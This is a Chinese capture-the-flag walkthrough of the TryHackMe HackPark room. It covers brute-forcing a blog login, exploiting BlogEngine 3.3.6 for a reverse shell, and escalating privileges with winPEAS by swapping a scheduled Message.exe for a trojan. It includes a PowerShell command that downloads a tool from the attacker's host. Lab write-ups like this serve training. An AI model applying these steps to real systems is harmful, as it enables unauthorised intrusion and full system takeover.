THM-HackPark-密码爆破--rce-WinPEAS提权

1.端口扫描

2.web渗透

寻找一番,发现只有个登录页面有点用

猜测用户名是admin,密码用bp爆破一下

得到密码是1qaz2wsx,登陆进去是一个后台页面

得到blogengine服务版本是3.3.6

搜索相关漏洞:https://www.exploit-db.com/exploits/46353

具体漏洞利用要点击页面的NEW添加木马

注意这里的木马文件要改成PostView.asc

http://10.10.245.157/?theme=../../App_Data/files

最后再访问这个url即可接收到反弹shell

3.权限提升

根据room的提示,我们下载一个脚本工具:https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe

本地开启http服务,将winPEAS上传到shell

cd C:\Windows\Temp    该目录全局可写‘

powershell -c wget "http://10.2.93.221:8000/Desktop/winPEASx64.exe" -outfile "winPEASx64.exe"

dir

winPEASx64.exe

写入脚本后运行,找到service information

可以看到异常服务的文件路径:C:\Program Files (x86)\SystemScheduler

进入该路径

查看Events日志文件,目录下有一个文件:20198415519.INI_LOG.txt

查看该日志文件

可以看到系统隔半分钟执行一次Message.exe,这样我们可以再上传一个反弹shell木马替换掉该文件就能让系统执行我们的木马,普通shell的权限不能使用mv命令,我们利用msf升级为meterpreter shell

有了足够的权限,我们先覆盖掉原来的Message.exe,再上传假的Message.exe木马(注意这里需要再开一个msf接收root shell)

  • 11
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值